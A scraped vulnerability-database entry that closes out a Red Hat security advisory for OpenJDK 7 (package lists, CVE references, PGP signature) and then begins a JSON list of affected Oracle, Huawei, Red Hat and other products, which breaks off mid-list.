x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm
i386: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm
i386: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm
ppc64: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm java-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm
s390x: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.s390x.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.s390x.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.s390x.rpm java-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.s390x.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.ael7b_1.src.rpm
ppc64le: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm java-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm
ppc64: java-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm
s390x: java-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.s390x.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.s390x.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.s390x.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.s390x.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.ael7b_1.noarch.rpm
ppc64le: java-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-2590 https://access.redhat.com/security/cve/CVE-2015-2601 https://access.redhat.com/security/cve/CVE-2015-2621 https://access.redhat.com/security/cve/CVE-2015-2625 https://access.redhat.com/security/cve/CVE-2015-2628 https://access.redhat.com/security/cve/CVE-2015-2632 https://access.redhat.com/security/cve/CVE-2015-2808 https://access.redhat.com/security/cve/CVE-2015-4000 https://access.redhat.com/security/cve/CVE-2015-4731 https://access.redhat.com/security/cve/CVE-2015-4732 https://access.redhat.com/security/cve/CVE-2015-4733 https://access.redhat.com/security/cve/CVE-2015-4748 https://access.redhat.com/security/cve/CVE-2015-4749 https://access.redhat.com/security/cve/CVE-2015-4760 https://access.redhat.com/security/updates/classification/#critical https://bugzilla.redhat.com/show_bug.cgi?id=1207101#c11 https://bugzilla.redhat.com/show_bug.cgi?id=1223211#c33
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFVpliAXlSAg2UNWIIRAmDIAKC0SKJPEBiUrI0sgDcQMZTM/nm7nwCfUIje QU57Hj/UGZeY+OmKchPFPcI= =miFC -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201504-0247", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre 1.7.0 17", "scope": null, "trust": 1.8, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 45", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 1.5, "vendor": "oracle", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 1.3, "vendor": "ibm", "version": "10.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 1.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 1.3, "vendor": "ibm", "version": "10.2" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 1.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 1.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "jre update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.7.072" }, { "model": "jdk 1.7.0 45", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.7.072" }, { "model": "jdk update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.8.025" }, { "model": "jre update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.6.085" }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.6.085" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 1.2, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 1.2, "vendor": "oracle", "version": "1.8.025" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "sparc enterprise m8000", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp" }, { "model": "s3700", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "integrated lights out manager", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "3.0.0" }, { "model": "integrated lights out manager", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "3.2.11" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "oceanstor s5800t", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "s5720ei", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "sparc enterprise m3000", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp_1121" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "sparc enterprise m8000", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp_1121" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "e6000", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "smc2.0", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r002c01" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "oceanstor s5500t", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "http server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "policy center", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r003c00" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "11" }, { "model": "policy center", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r003c10" }, { "model": "quidway s9300", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "s5700ei", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "s5710hi", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "ultravr", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r003c00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "smc2.0", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r002c04" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.5" }, { "model": "s5700si", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "http server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "http server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.1.1.0" }, { "model": "sparc enterprise m4000", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp_1121" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.6" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "http server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "sparc enterprise m5000", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp" }, { "model": "communications application session controller", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "3.9.0" }, { "model": "s5710ei", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "11" }, { "model": "s5700s-li", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "oceanstor 9000", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "s5720hi", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "smc2.0", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r002c03" }, { "model": "smc2.0", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r002c02" }, { "model": "http server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.3.0.0" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "oceanstor 18800", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "s7700", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "linux enterprise debuginfo", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "11" }, { "model": "sparc enterprise m3000", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp" }, { "model": "9700", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "satellite", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.7" }, { "model": "oceanstor vis6600t", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "manager", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "1.7" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "11" }, { "model": "s5700li", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "s12700", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.04" }, { "model": "communications policy management", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "9.9.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "satellite", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.6" }, { "model": "oceanstor s2600t", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "oceanstor cse", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "oceanstor 18800f", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "s2700", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "integrated lights out manager", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "4.0.4" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.6" }, { "model": "te60", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "oceanstor replicationdirector", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": "v100r003c00" }, { "model": "communications application session controller", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "3.0.0" }, { "model": "e9000", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "integrated lights out manager", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "4.0.0" }, { "model": "sparc enterprise m9000", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "oceanstor 18500", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "sparc enterprise m4000", "scope": "gte", "trust": 1.0, "vendor": "fujitsu", "version": "xcp" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "10" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "s5700hi", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "s6700", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.1" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "sparc enterprise m5000", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp_1121" }, { "model": "sparc enterprise m9000", "scope": "lt", "trust": 1.0, "vendor": "fujitsu", "version": "xcp_1121" }, { "model": "oceanstor s5600t", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "s2750", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "oceanstor hvs85t", "scope": "eq", "trust": 1.0, "vendor": "huawei", "version": null }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6.081" }, { "model": "jdk 1.6.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0:update 75", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0:update 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6.081" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.845" }, { "model": "jre 1.6.0:update 75", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.840" }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.691" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.695" }, { "model": "jre 1.8.0:update 5", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.845" }, { "model": "jdk 1.8.0:update 5", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.776" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 14", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 15", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.780" }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 